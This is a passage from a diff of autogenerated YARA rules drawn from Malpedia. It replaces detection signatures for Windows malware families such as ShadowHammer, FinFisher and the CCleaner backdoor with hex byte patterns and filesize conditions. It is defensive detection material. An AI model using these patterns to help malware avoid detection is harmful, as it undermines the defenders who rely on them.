e8???????? 8b4df8 } + $sequence_9 = { e8???????? c70021000000 e9???????? 894ddc c745e034bf4200 e9???????? c745e030bf4200 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <516096 } -rule MALPEDIA_Win_Mortalkombat_Auto : FILE +rule MALPEDIA_Win_Fengine_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5bbf17fe-00b4-5a92-b5e3-f942b94b6ce0" + id = "c3f38b1d-0317-5325-80d6-6bc13a77b878" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mortalkombat_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fengine" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fengine_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "7d4e235b241a7bc491c490ef8ff26987513d97053d43652b54aa2deceb4dd9ea" + logic_hash = "04b59b3b4a1631576dab348f5698f6f17211f788439d858316727821c2f4b921" score = 75 quality = 75 tags = "FILE" @@ -158572,32 +161256,32 @@ rule MALPEDIA_Win_Mortalkombat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33d2 ad 3382b96d4000 ab 83c204 } - $sequence_1 = { 6a00 6803800000 ff75fc e8???????? 83f800 7e35 6a00 } - $sequence_2 = { 2bc1 81ebb979379e 8bc8 c1e104 } - $sequence_3 = { 83f8ff 7402 eb67 6a00 6a00 6a02 } - $sequence_4 = { e8???????? 50 ff75ac e8???????? 8945a4 33c0 50 } - $sequence_5 = { 803d????????01 7519 68???????? 68???????? 68???????? } - $sequence_6 = { c705????????f4010000 68???????? e8???????? a3???????? a0???????? } - $sequence_7 = { ff7514 6a01 6a00 ff7510 ff75f8 } - $sequence_8 = { 68???????? e8???????? 83c710 6a10 } - $sequence_9 = { 50 e8???????? ebd8 8b45bc } + $sequence_0 = { 72e2 8b5c2414 8d842490000000 50 } + $sequence_1 = { 833cfd4010410000 755b 6a18 e8???????? 59 } + $sequence_2 = { 50 ff15???????? 68???????? 8d85fcf7ffff 6800080000 } + $sequence_3 = { 7405 352083b8ed 46 3bf7 0f825fffffff 5f } + $sequence_4 = { c1e81e 83e001 83e101 8d0c48 8bc6 } + $sequence_5 = { 53 8d4e04 6800080000 51 } + $sequence_6 = { 56 e8???????? 8b8de4feffff 8b95e0feffff 8b413c 03c6 8bb5dcfeffff } + $sequence_7 = { 83c408 85c0 750f c705????????03000000 e9???????? ffb5bcfaffff } + $sequence_8 = { eb23 8b9d2ce5ffff 8a02 8b0c9d60514100 } + $sequence_9 = { 83e31f c1e306 8b048560514100 0fbe441804 83e001 } condition: - 7 of them and filesize <1224704 + 7 of them and filesize <210944 } -rule MALPEDIA_Win_Dnespy_Auto : FILE +rule MALPEDIA_Win_Shadowhammer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "70dfc3a2-0802-5571-8c6e-dca5ba3f52dd" + id = "194406b6-a98b-5404-b2f3-d5df631c65c0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dnespy_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shadowhammer_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "5f9d7d06b9dad4ee82945ca7222951c2d8150747511ca4dc6b623794062c6006" + logic_hash = "34aeb940c0c6ad0698f1f0e3ab023525d38575b33eb7ba408d437819a37427e5" score = 75 quality = 75 tags = "FILE" @@ -158611,34 +161295,34 @@ rule MALPEDIA_Win_Dnespy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83ec18 8d4508 8bcc 50 e8???????? ba01000000 8d4dc8 } - $sequence_1 = { f30f7e4594 8b459c 660fd645a4 8945ac 7209 8b0e 8bc1 } - $sequence_2 = { 8bf1 8954240c 57 8b7d08 89442414 837e4c00 7471 } - $sequence_3 = { 74e7 83f80d 74e2 40 83f87e 0f878b010000 } - $sequence_4 = { 6a50 668945e8 ff15???????? 668945ea 8d45e8 6a10 } - $sequence_5 = { 0f84f0000000 8bc8 e8???????? 8bd0 c745e000000000 8bca c745e40f000000 } - $sequence_6 = { 6a00 6a00 8d85e0cfffff 50 6a00 ff15???????? ffb5a0cfffff } - $sequence_7 = { 8a18 3a19 750a 40 41 3bc2 75f0 } - $sequence_8 = { 744b 8d45f4 c745f000000000 50 8d45f8 c745f800000000 50 } - $sequence_9 = { c685ebfeffff00 c685ecfeffff0f c685edfeffff0a c685eefeffff03 8a85dcfeffff c685effeffff00 0f1f440000 } + $sequence_0 = { 03d3 03f3 03fb 894dfc 8945f4 } + $sequence_1 = { c3 e8???????? c21000 8bff 55 8bec 833d????????01 } + $sequence_2 = { 8dbd7dfdffff ab ab ab ab } + $sequence_3 = { 58 6a2d 66894584 58 } + $sequence_4 = { 685ac1cbc2 56 e8???????? 59 59 85c0 } + $sequence_5 = { c78564ffffff103ee0fc c78568ffffffb0cf4161 c7856cffffffb0fafb19 8dbd70ffffff } + $sequence_6 = { 8d45e8 50 ff75fc 895de8 8b07 } + $sequence_7 = { c78544fdffff6a0ad740 c78548fdffff667aadbd 33c0 8dbd4cfdffff ab 889d50fdffff 8dbd51fdffff } + $sequence_8 = { 8dbdfcfdffff ab 889d00feffff 8dbd01feffff ab ab } + $sequence_9 = { 8945a8 8d8574ffffff 33ff 8945ac 8d45b8 } condition: - 7 of them and filesize <794624 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Grease_Auto : FILE +rule MALPEDIA_Win_Hdmr_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "adc1cb70-ca80-5648-8c82-afd04a5873d7" + id = "efac4b5a-015c-5408-9681-2898b333d92b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grease_auto.yar#L1-L230" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hdmr_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "3adaa81800887e757966a0f8096c9ffe86dfca2fec47d710b3b77554cf1c8228" + logic_hash = "d93eae97d145bb46a0ed753e26aa98381b2be0cfcaaaf5d8753f4519f5f83cf1" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -158650,45 +161334,32 @@ rule MALPEDIA_Win_Grease_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 50 683f000f00 50 50 50 } - $sequence_1 = { 488b4c2460 ff15???????? b801000000 488b8c2480020000 4833cc e8???????? 4881c490020000 } - $sequence_2 = { 4533c0 488bd3 c744242804000000 4889442420 ff15???????? 488b4c2450 ff15???????? } - $sequence_3 = { 488b05???????? 4833c4 4889842480020000 488d4c2472 } - $sequence_4 = { c74424281f000200 895c2420 ff15???????? 85c0 0f85e7000000 } - $sequence_5 = { 4533c9 48897c2440 4889442438 48897c2430 } - $sequence_6 = { 48895c2440 48895c2458 895c2460 48895c2468 } - $sequence_7 = { 4889442438 48897c2430 4533c0 c74424283f000f00 897c2420 ff15???????? 85c0 } - $sequence_8 = { 488b4c2450 488d442458 41b904000000 4533c0 488bd3 } - $sequence_9 = { 55 68000000c0 50 ff15???????? 8bf0 } - $sequence_10 = { e9???????? c684342c08000023 e9???????? c684342c08000021 e9???????? c684342c08000025 } - $sequence_11 = { 51 683f000f00 6a00 8d542424 52 6802000080 ffd7 } - $sequence_12 = { 85c0 7540 8d542420 52 8b542414 } - $sequence_13 = { 83c001 3acb 75f7 8b2d???????? } - $sequence_14 = { 83c404 85f6 8854240c 8d46ff 7412 8a4c040c } - $sequence_15 = { e9???????? c684341001000066 e9???????? c684341001000068 e9???????? } - $sequence_16 = { e8???????? 8b0d???????? 51 8d542418 } - $sequence_17 = { e9???????? c6440c082b e9???????? c6440c083e e9???????? c6440c083d e9???????? } - $sequence_18 = { c68434240600003f eb12 c68434240600002e eb08 } - $sequence_19 = { 8a08 40 84c9 7405 46 85c0 } - $sequence_20 = { 8b9c2418040000 56 57 b90d000000 be???????? } - $sequence_21 = { 50 897c2430 ffd5 8b542410 6a04 8d4c241c 51 } - $sequence_22 = { 8d942434010000 52 56 ffd7 b83b000000 53 668984242c010000 } + $sequence_0 = { 8945e0 85c0 7461 8d0cbd40d04100 8901 8305????????20 8b11 } + $sequence_1 = { 8945ec 894df0 894dfc 8b16 8b523c 50 } + $sequence_2 = { c1e810 4a 75e6 eb07 } + $sequence_3 = { 56 8b7508 68fe070000 8d85fef7ffff 6a00 } + $sequence_4 = { 85db 0f8492010000 8b8d70ffffff 0fb709 } + $sequence_5 = { 250000ff00 81e3000000ff 33c3 8bda 81e2ff000000 } + $sequence_6 = { 0fb701 0fb71c0f 2bc3 2bc2 } + $sequence_7 = { 75ea 8a03 3c61 0fbec0 } + $sequence_8 = { 8b400c 51 52 8bce ffd0 5e 5b } + $sequence_9 = { 50 ff15???????? 8d8c24780a0000 51 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <284672 } -rule MALPEDIA_Win_Nexster_Bot_Auto : FILE +rule MALPEDIA_Win_Finfisher_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f3849f7f-92fa-5a27-8fce-5cf70a6092f1" + id = "3ef79a6b-24c3-58ed-a290-c5a2a7e3fb1b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nexster_bot_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.finfisher_auto.yar#L1-L148" license_url = "N/A" - logic_hash = "68d99297d7676950ef20645c2f54f180e697aada925cf75041287d48b2b4b344" + logic_hash = "dcf5252aa492d908a47d122045beaf12bf03e72009d0665a415b9ab4e015a1e5" score = 75 quality = 75 tags = "FILE" @@ -158702,32 +161373,36 @@ rule MALPEDIA_Win_Nexster_Bot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 e8???????? 68ff030000 8d85bd090000 } - $sequence_1 = { ff15???????? 668985ae010000 6a10 8d85ac010000 50 57 } - $sequence_2 = { 7d10 668b4c4310 66890c45186e4100 40 ebe8 33c0 } - $sequence_3 = { 03f9 837d1810 7208 8b5d04 } - $sequence_4 = { 33c0 8da42400000000 8a1485d0604100 889405000e0000 40 83f80b } - $sequence_5 = { 731a 8bc8 83e01f c1f905 8b0c8d20804100 c1e006 03c1 } - $sequence_6 = { 81c404040000 c3 53 56 57 8bf8 } - $sequence_7 = { 66898c24bc010000 e9???????? 8b15???????? a1???????? 8b0d???????? 899424b0010000 } - $sequence_8 = { 68???????? 52 e8???????? 68???????? 8d85bc110000 50 } - $sequence_9 = { 8a08 40 84c9 75f9 8dbdbc150000 2bc6 4f } + $sequence_0 = { 68???????? 6804010000 8d85ccf9ffff 50 } + $sequence_1 = { 56 8d85ccf9ffff 50 e8???????? } + $sequence_2 = { 6a20 6a03 8d8594f7ffff 50 8d8578f7ffff 50 68000000c0 } + $sequence_3 = { 663bc1 7506 8345e404 ebd8 } + $sequence_4 = { 0f853affffff c785d0fbffffd5d8ffff e9???????? 8b07 83e808 } + $sequence_5 = { 52 68a0608000 eb11 8b4708 8b4dd4 } + $sequence_6 = { 397714 7403 56 eb02 6a02 56 50 } + $sequence_7 = { e8???????? 56 e8???????? 8b861c030000 3d10270000 } + $sequence_8 = { 56 8d859cf7ffff 50 56 a1???????? } + $sequence_9 = { 85db 7424 8b17 8d448614 8b08 } + $sequence_10 = { e9???????? 8b859cf7ffff ff7004 ff15???????? 8985c0f7ffff 8b8d9cf7ffff } + $sequence_11 = { 6a09 ff15???????? 3bc6 7490 8bd0 } + $sequence_12 = { ffb5b8f7ffff eb5f 8d8578f7ffff 50 6a01 8d85acf7ffff } + $sequence_13 = { 8d85acfbffff 50 53 56 } condition: - 7 of them and filesize <245760 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Himan_Auto : FILE +rule MALPEDIA_Win_Nachocheese_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a882d092-072a-5641-b214-8642f7cc1e11" + id = "eaa2162c-aba5-5a56-92b8-2694c1a819b5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.himan_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nachocheese_auto.yar#L1-L162" license_url = "N/A" - logic_hash = "bf239bbd05c563f996119e72de32999d711849487b106db1285219d82e77b92b" + logic_hash = "65398c7b0a5280da9a71f8939ca7f529421377deec37e9f371d0deba7b01dc67" score = 75 quality = 75 tags = "FILE" @@ -158741,32 +161416,38 @@ rule MALPEDIA_Win_Himan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b7b04 33ee 8b7068 0554010000 c1e204 33f7 } - $sequence_1 = { 8b442410 3bd0 7422 56 ff15???????? 57 ff15???????? } - $sequence_2 = { 894c2414 8bcb c1e910 81e1ff000000 } - $sequence_3 = { c1e008 0bc7 c1e008 0bc1 8bc8 8904b594886e00 } - $sequence_4 = { 8bda c1eb18 8b2cad948c6e00 332c9d94946e00 8bd9 c1eb10 81e3ff000000 } - $sequence_5 = { 8b08 50 ff5108 8b8c24a8050000 5f } - $sequence_6 = { 8d85a0fcffff 50 ff15???????? 8da594d4ffff 5f 5e 5b } - $sequence_7 = { c1e910 3334adbcc26e00 8beb 81e5ff000000 81e1ff000000 c1eb08 3334adbcba6e00 } - $sequence_8 = { 333c9594946e00 8b542414 c1ea10 81e2ff000000 333c9594906e00 8bd1 81e2ff000000 } - $sequence_9 = { c1c108 890cb5948c6e00 8a8ebccb6e00 8bd0 884c2410 8b7c2410 c1c210 } + $sequence_0 = { 3d9c000000 7c07 3d9f000000 7e0d 33c0 c3 05d13fffff } + $sequence_1 = { 33f6 397508 0f8ec9000000 b8???????? 48 } + $sequence_2 = { 2bfa 8d47fd 3901 8901 } + $sequence_3 = { 02ca 880c3e 8a5005 32d1 8b4dfc 88143e 8a4c0105 } + $sequence_4 = { 7305 83c303 eb1c 81fb00000100 } + $sequence_5 = { 33c8 894710 8b4708 33c1 } + $sequence_6 = { 7305 83c304 eb0f 81fb00000001 } + $sequence_7 = { 7305 83c302 eb29 81fb00010000 } + $sequence_8 = { 0f8539ffffff b8???????? 8d5001 8a08 } + $sequence_9 = { 3d2cc00000 7f18 3d2bc00000 7d1b 3d9c000000 } + $sequence_10 = { 763a b801011000 f7e6 8bc6 2bc2 d1e8 } + $sequence_11 = { 0f84bf000000 6803010000 8895f0fcffff 8d95f1fcffff 6a00 52 e8???????? } + $sequence_12 = { 50 e8???????? 8d8f0e010000 8bc1 83c430 8d5001 } + $sequence_13 = { 02ca 8b55f4 880c3e 0fb6540205 } + $sequence_14 = { 50 e8???????? b9???????? 83c424 } + $sequence_15 = { 50 6a02 51 ff15???????? 83f801 } condition: - 7 of them and filesize <139264 + 7 of them and filesize <1064960 } -rule MALPEDIA_Win_Varenyky_Auto : FILE +rule MALPEDIA_Win_Mistcloak_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "799963a3-0366-58c7-b923-0a51c9db342a" + id = "bcb29aaa-c37e-5c55-be1e-5d06aa41cabd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.varenyky_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mistcloak_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "9e07244b9e5d336f26b69f46ff4024108fa6443c2648edcc9fb5aa11d967154b" + logic_hash = "6962ced189f702e03fc18d236cee46a2a0844476537e8c819ea6f1c43f9c0922" score = 75 quality = 75 tags = "FILE" @@ -158780,32 +161461,32 @@ rule MALPEDIA_Win_Varenyky_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b3d???????? 8b542418 6a00 52 8d8424c0130000 50 55 } - $sequence_1 = { 8d542435 6a00 52 c644243c00 e8???????? } - $sequence_2 = { 6880000000 8bd6 52 ff15???????? 6803010000 8d842485020000 } - $sequence_3 = { 83c40c 6a40 898424a4010000 898c249c010000 8a0d???????? 899424a0010000 8d442450 } - $sequence_4 = { 03f0 0fbe01 3bc3 75f0 } - $sequence_5 = { 57 e8???????? 83c404 3c32 } - $sequence_6 = { 8d84244d030000 53 50 c744242404010000 889c2454030000 e8???????? } - $sequence_7 = { 51 ffd6 68???????? 8d542474 52 ffd7 } - $sequence_8 = { 56 57 6803010000 8d44243d 53 50 885c2444 } - $sequence_9 = { 41 03e8 0fbe01 3bc3 75f0 0fbe842440020000 } + $sequence_0 = { 8b049590500110 f644082801 740b 56 e8???????? 59 8bf0 } + $sequence_1 = { 660f282d???????? 660f59f5 660f28aa70100110 660f54e5 660f58fe 660f58fc } + $sequence_2 = { 8b0c8590500110 8b45f8 807c012800 7d46 } + $sequence_3 = { 0f85b1000000 8b4508 dd00 ebc2 c745e418120110 eb19 } + $sequence_4 = { 6bc618 57 8db8104e0110 57 } + $sequence_5 = { 7429 83e805 7415 83e801 0f8595010000 c745e408120110 } + $sequence_6 = { c745e408120110 e9???????? c745e404120110 e9???????? 894de0 c745e404120110 e9???????? } + $sequence_7 = { 85f6 7420 6bc618 57 8db8104e0110 57 } + $sequence_8 = { 8bc1 3914c5781a0110 7408 40 } + $sequence_9 = { 8b45b4 8b0c8590500110 8a043b 03ce 8b75dc 03cb 43 } condition: - 7 of them and filesize <24846336 + 7 of them and filesize <196608 } -rule MALPEDIA_Win_Gaudox_Auto : FILE +rule MALPEDIA_Win_Crytox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1eecaa5e-0125-509a-9dab-e8ce2f4b63fe" + id = "0ddd8657-2514-5374-8039-613e49f7d728" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gaudox_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crytox_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "7eb2982f230b20ae36bb88377d3dc0b3ae4c2623263daca498d5416d3995e6aa" + logic_hash = "53a20cdadf7c04d8a44d2123a9699db23173b707dd2f3ef0f82ea172db5f35fb" score = 75 quality = 75 tags = "FILE" @@ -158819,34 +161500,34 @@ rule MALPEDIA_Win_Gaudox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7403 c60000 8bce e8???????? 8b45f8 85c0 7410 } - $sequence_1 = { 837df000 0f849a000000 6a00 8d95c4feffff 52 b804000000 6bc800 } - $sequence_2 = { 8d8c2458030000 e8???????? 8bf0 85f6 0f88df000000 a1???????? 8d8c2450030000 } - $sequence_3 = { a1???????? 57 ffb0b8000000 eb26 8bb8b0000000 83ff54 } - $sequence_4 = { 13c9 66f3ab 8b450c 03f0 8bc6 5f 5e } - $sequence_5 = { 56 8b7014 81feb8000000 7729 68???????? b9???????? e8???????? } - $sequence_6 = { ff75fc 8bf0 6a08 6a00 e8???????? 85f6 782a } - $sequence_7 = { 8b45f4 8b5018 85d2 74ec 6a00 6a00 68d113282e } - $sequence_8 = { 57 85c0 0f84ad010000 85d2 0f84a5010000 8b7d08 85ff } - $sequence_9 = { 8d442460 50 6a27 6a00 e8???????? 85c0 781c } + $sequence_0 = { eb7d 85f6 7479 c645c800 e8???????? 85c0 89c3 } + $sequence_1 = { dfe9 0f86c2e3ffff 89442410 89c1 c1fa02 db442410 c1f902 } + $sequence_2 = { e8???????? 8b4510 3b4518 741d 0fbf45c4 c1e002 89442408 } + $sequence_3 = { e8???????? 89c3 8b45dc 85c0 0f84adfeffff 8d65f4 89d8 } + $sequence_4 = { eb02 d9c9 83c301 038d30ffffff 399d04ffffff 7f8e ddd9 } + $sequence_5 = { f1 807de700 89d3 7510 6bc22c 80b84442660000 0f85ac000000 } + $sequence_6 = { c5c5fe3d???????? c5c572e70e c5fd7f9c24000b0000 c5e572e50e c5d572e60e c5fd7f9c24e0090000 c5ddfe15???????? } + $sequence_7 = { dee9 d95dc0 8b45e0 83c001 8d148500000000 8b4508 01d0 } + $sequence_8 = { e9???????? 8b7d24 8b4510 85ff c70000000000 742b 8b4508 } + $sequence_9 = { dec9 d96c2424 db5c2420 d96c2426 8b742420 d9e8 dfe9 } condition: - 7 of them and filesize <155648 + 7 of them and filesize <6156288 } -rule MALPEDIA_Win_Ccleaner_Backdoor_Auto : FILE +rule MALPEDIA_Win_Dnespy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fc5d42e4-2b09-51e8-9476-e6d57b9f6fbe" + id = "70dfc3a2-0802-5571-8c6e-dca5ba3f52dd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ccleaner_backdoor_auto.yar#L1-L264" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dnespy_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "437c1ac4e0723d85ccca29c304bbc711ed3ae66fbe1eeb3f8d5172b567e72b6c" + logic_hash = "5f9d7d06b9dad4ee82945ca7222951c2d8150747511ca4dc6b623794062c6006" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -158858,51 +161539,32 @@ rule MALPEDIA_Win_Ccleaner_Backdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 ffd6 50 ff15???????? 8b3d???????? } - $sequence_1 = { ff15???????? 8b3d???????? 59 ffd7 } - $sequence_2 = { 750a b857000780 e9???????? e8???????? } - $sequence_3 = { 01460c 488b3f 493bfc 0f8554ffffff } - $sequence_4 = { 00cc cc 4883ec28 488b11 } - $sequence_5 = { 49 75f9 ffd3 6800400000 } - $sequence_6 = { ff75f0 ff15???????? 85c0 0f850c010000 8b35???????? 53 } - $sequence_7 = { 01442424 eb30 8b4508 897518 } - $sequence_8 = { 03c0 894340 8b7340 418bc4 } - $sequence_9 = { 03c6 4863d0 4c8d0c12 4c8d4718 } - $sequence_10 = { 03c6 85c0 7f09 488b0a 488b01 ff5008 488b4b28 } - $sequence_11 = { 891d???????? 68???????? 6a03 53 68???????? ff742424 891d???????? } - $sequence_12 = { 6a04 50 8d45e0 6a04 50 8d85e0feffff 50 } - $sequence_13 = { c1e008 8d8418a1000000 50 e8???????? 85c0 7545 } - $sequence_14 = { 012e 33c0 5f 5e 5d } - $sequence_15 = { 00cc cc 4057 4883ec50 4533db } - $sequence_16 = { 8b7df8 0faff8 ffd6 33f8 } - $sequence_17 = { 01442454 03d1 294c2450 8b4c2410 } - $sequence_18 = { 50 68???????? ff742418 ff15???????? 85c0 0f8579010000 } - $sequence_19 = { c7471854b40210 c1e803 3bc1 7302 8bc8 6afd } - $sequence_20 = { 3bc2 7661 89450c 8a06 46 50 e8???????? } - $sequence_21 = { 013d???????? 8b04b5d8970210 0500080000 3bc8 } - $sequence_22 = { 3b7d10 0f8264010000 3bfa 0f835c010000 2bda 8d4602 } - $sequence_23 = { 013e 33c0 8b16 83c410 } - $sequence_24 = { e8???????? 8b4510 59 f7d8 } - $sequence_25 = { 01442418 03c8 8954242c 8b542470 } - $sequence_26 = { 01461c 8b542424 85d2 7405 } - $sequence_27 = { 01cc cc 48895c2408 57 } - $sequence_28 = { 4c 8bca c1e002 4c 03d5 48 } + $sequence_0 = { 83ec18 8d4508 8bcc 50 e8???????? ba01000000 8d4dc8 } + $sequence_1 = { f30f7e4594 8b459c 660fd645a4 8945ac 7209 8b0e 8bc1 } + $sequence_2 = { 8bf1 8954240c 57 8b7d08 89442414 837e4c00 7471 } + $sequence_3 = { 74e7 83f80d 74e2 40 83f87e 0f878b010000 } + $sequence_4 = { 6a50 668945e8 ff15???????? 668945ea 8d45e8 6a10 } + $sequence_5 = { 0f84f0000000 8bc8 e8???????? 8bd0 c745e000000000 8bca c745e40f000000 } + $sequence_6 = { 6a00 6a00 8d85e0cfffff 50 6a00 ff15???????? ffb5a0cfffff } + $sequence_7 = { 8a18 3a19 750a 40 41 3bc2 75f0 } + $sequence_8 = { 744b 8d45f4 c745f000000000 50 8d45f8 c745f800000000 50 } + $sequence_9 = { c685ebfeffff00 c685ecfeffff0f c685edfeffff0a c685eefeffff03 8a85dcfeffff c685effeffff00 0f1f440000 } condition: - 7 of them and filesize <377856 + 7 of them and filesize <794624 } -rule MALPEDIA_Win_Ranbyus_Auto : FILE +rule MALPEDIA_Win_Megumin_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9b877552-6bf5-5d12-bef1-733cc6b8feac" + id = "992bacc8-d168-5613-b9a1-b270fb7e71d1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ranbyus_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.megumin_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "c376990edfad6c071124a105ec8d7e8afaf3007f10ae4746a7ce39d3890ccde0" + logic_hash = "d3f02e69acad5c637179e097455fd85b104ce227d90fce5cb059c87c08c3436c" score = 75 quality = 75 tags = "FILE" @@ -158916,32 +161578,32 @@ rule MALPEDIA_Win_Ranbyus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7504 83c8ff c3 c7402401000000 } - $sequence_1 = { 894608 8b44241c 56 68???????? 89460c } - $sequence_2 = { 83c414 85f6 7414 6a01 6a01 57 } - $sequence_3 = { 760a 814e2500500000 c6060f 0fb606 5e 5b } - $sequence_4 = { a1???????? eb09 83780400 7507 8b4034 85c0 } - $sequence_5 = { e8???????? 59 8b4e05 89410b 8b4605 39780b 7407 } - $sequence_6 = { 8b4e05 89410b 8b4605 39780b } - $sequence_7 = { 83c621 8a06 3c46 7240 3c47 } - $sequence_8 = { 83780400 7507 8b4034 85c0 75f3 c3 } - $sequence_9 = { c3 837c240800 7467 8b44240c } + $sequence_0 = { 8b348510164600 037520 6b45243c 034528 6bc03c 03452c } + $sequence_1 = { 8945e8 57 8d4dd8 c745fc00000000 e8???????? 8b45e8 85c0 } + $sequence_2 = { 8d45f4 64a300000000 6841010000 8d8528faffff c745fc00000000 6a00 50 } + $sequence_3 = { 8d4dd8 8d45c0 50 e8???????? ff37 8d55d7 8d4db0 } + $sequence_4 = { c60100 e8???????? 8d4c2430 e8???????? 8bc8 83c418 83791410 } + $sequence_5 = { 833d????????00 0f8549870000 8d0d90e74500 ba1d000000 e9???????? 833d????????00 0f852c870000 } + $sequence_6 = { 83c404 8d8d14fdffff c645fc1a 51 8bd0 8d8d04fbffff } + $sequence_7 = { 0f1f440000 8845eb 8b410c 897da8 8945b0 c645fc02 } + $sequence_8 = { 8d4101 8945d8 3dffffff7f 0f8700010000 6a00 6a00 50 } + $sequence_9 = { 3bca 763b 8bd1 a81f 7535 8b48fc } condition: - 7 of them and filesize <638976 + 7 of them and filesize <1007616 } -rule MALPEDIA_Win_Forest_Tiger_Auto : FILE +rule MALPEDIA_Win_Cova_Auto : FILE { meta: description = "autogenerated rule brought to you by 